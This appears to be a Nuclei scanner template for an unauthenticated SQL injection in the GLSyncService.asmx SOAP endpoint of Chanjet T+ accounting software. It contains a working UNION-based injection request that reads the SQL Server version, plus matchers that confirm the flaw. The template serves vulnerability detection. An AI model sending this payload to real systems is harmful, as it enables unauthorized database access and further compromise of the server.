id: changjet-tplus-GLSyncService-sqli
info:
  name: 畅捷通T+ GLSyncService.asmx存在SQL注入漏洞
  author: leadlife
  severity: high
  description: 由于畅捷通T+的GLSyncService.asmx接口处未对用户的输入进行过滤和校验，未经身份验证的攻击者除了可以利用 SQL 注)漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。
  reference: 
    - https://mp.weixin.qq.com/s?__biz=MzE5MTM2MjA0NQ==&mid=2247483683&idx=1&sn=ba2bc6bec67b2abc0c80f12cb366253f&chksm=9606e7b1a1716ea7d89efb4efcef79d80e116d3e58b5a23e4b31ae7179e5584998456ea1d749&cur_album_id=4045056277938913283&scene=189#wechat_redirect
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: changjet,tplus

http:
  - raw:
      - |
        POST /tplus/GLSyncService.asmx HTTP/1.1
        SOAPAction: "http://www.chanjet.com/GetSourceAccountDataTable"
        Accept-Encoding: gzip
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetSourceAccountDataTable xmlns="http://www.chanjet.com/">
              <versionType>' UNION ALL SELECT NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VsIH</versionType>
            </GetSourceAccountDataTable>
          </soap:Body>
        </soap:Envelope>

    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains_all(body,'Microsoft SQL Server')
        condition: and